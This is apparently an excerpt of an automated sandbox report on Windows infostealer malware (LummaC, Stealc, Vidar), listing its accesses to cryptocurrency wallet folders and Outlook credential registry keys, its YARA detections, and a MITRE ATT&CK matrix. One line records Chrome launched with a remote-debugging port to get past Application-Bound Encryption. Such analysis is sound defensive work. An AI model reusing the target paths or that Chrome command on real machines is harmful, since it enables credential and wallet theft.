Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\KLIZUSIQEN
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\VWDFPKGDUF
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\EEGWXUHVUG
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\JDDHMPCDUJ
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\KLIZUSIQEN
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\VWDFPKGDUF
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\EEGWXUHVUG
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\JDDHMPCDUJ
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\JDDHMPCDUJ
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\VWDFPKGDUF
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\KLIZUSIQEN
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\EEGWXUHVUG
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\EEGWXUHVUG
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\KLIZUSIQEN
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\KLIZUSIQEN
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\LFOPODGVOH
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\LFOPODGVOH
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\HQJBRDYKDE
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\HQJBRDYKDE
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\JDDHMPCDUJ
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\JDDHMPCDUJ
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\KLIZUSIQEN
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\LFOPODGVOH
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\EEGWXUHVUG
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\KLIZUSIQEN
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\LFOPODGVOH
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\LFOPODGVOH
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\LFOPODGVOH
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\EEGWXUHVUG
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\HQJBRDYKDE
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\KLIZUSIQEN
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\KLIZUSIQEN
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\LFOPODGVOH
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\HQJBRDYKDE
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\KLIZUSIQEN
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\KLIZUSIQEN
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Directory queried: C:\Users\user\Documents\EEGWXUHVUG

Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe

Directory queried: number of queries: 2553

Source: Yara match	File source: 00000023.00000003.3140028229.0000000001170000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.3184454599.0000000001170000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2407206885.000000000066C000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.3090456756.000000000116D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.3112297595.000000000116D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.3138038343.0000000001163000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.3092537480.000000000116D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.3168770434.0000000001170000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000003.3361596097.00000000014F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.3116272066.000000000116F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.3168645780.0000000001170000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.2952185414.00000000012F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.3138185002.000000000116F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 1868, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 6ca8f7e5e2.exe PID: 8632, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 6ca8f7e5e2.exe PID: 7720, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 6ca8f7e5e2.exe PID: 8104, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 6ca8f7e5e2.exe PID: 8632, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 6ca8f7e5e2.exe PID: 7720, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 6ca8f7e5e2.exe PID: 8104, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected Stealc

Source: Yara match	File source: 35.2.6ca8f7e5e2.exe.59534a1.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000022.00000002.3041803841.00000000000D1000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2020668907.00000000049C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.3385606032.0000000005F51000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.3001438574.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000003.3732193014.0000000008700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2407206885.00000000005A1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.3470246270.0000000000B2B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2409398510.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.3043088426.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.3328651914.00000000083E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.3467869264.00000000000D1000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000002.3776899724.0000000006261000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.3378808453.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 1868, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 9305c7ab92.exe PID: 3872, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 6ca8f7e5e2.exe PID: 7720, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 6ca8f7e5e2.exe PID: 8104, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 9305c7ab92.exe PID: 2968, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: Process Memory Space: file.exe PID: 1868, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 6ca8f7e5e2.exe PID: 7720, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 6ca8f7e5e2.exe PID: 8104, type: MEMORYSTR

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C840C40 sqlite3_bind_zeroblob,	0_2_6C840C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C840D60 sqlite3_bind_parameter_name,	0_2_6C840D60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C768EA0 sqlite3_clear_bindings,	0_2_6C768EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C840B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	0_2_6C840B40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C766410 bind,WSAGetLastError,	0_2_6C766410
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C766070 PR_Listen,	0_2_6C766070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C76C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	0_2_6C76C050
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C76C030 sqlite3_bind_parameter_count,	0_2_6C76C030
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7660B0 listen,WSAGetLastError,	0_2_6C7660B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6F22D0 sqlite3_bind_blob,	0_2_6C6F22D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7663C0 PR_Bind,	0_2_6C7663C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C769400 sqlite3_bind_int64,	0_2_6C769400
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7694F0 sqlite3_bind_text16,	0_2_6C7694F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7694C0 sqlite3_bind_text,	0_2_6C7694C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C769480 sqlite3_bind_null,	0_2_6C769480
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 24_2_00AFEC48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,	24_2_00AFEC48
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 24_2_00AFDF51 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::GetInternalContext,	24_2_00AFDF51

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	41 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 Scheduled Task/Job	2 Bypass User Account Control	21 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	41 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	111 Registry Run Keys / Startup Folder	1 Extra Window Memory Injection	3 Obfuscated Files or Information	Security Account Manager	22 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Remote Access Software	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	Login Hook	112 Process Injection	12 Software Packing	NTDS	248 System Information Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	2 PowerShell	Network Logon Script	1 Scheduled Task/Job	1 DLL Side-Loading	LSA Secrets	1 Query Registry	SSH	Keylogging	114 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	111 Registry Run Keys / Startup Folder	2 Bypass User Account Control	Cached Domain Credentials	871 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Extra Window Memory Injection	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
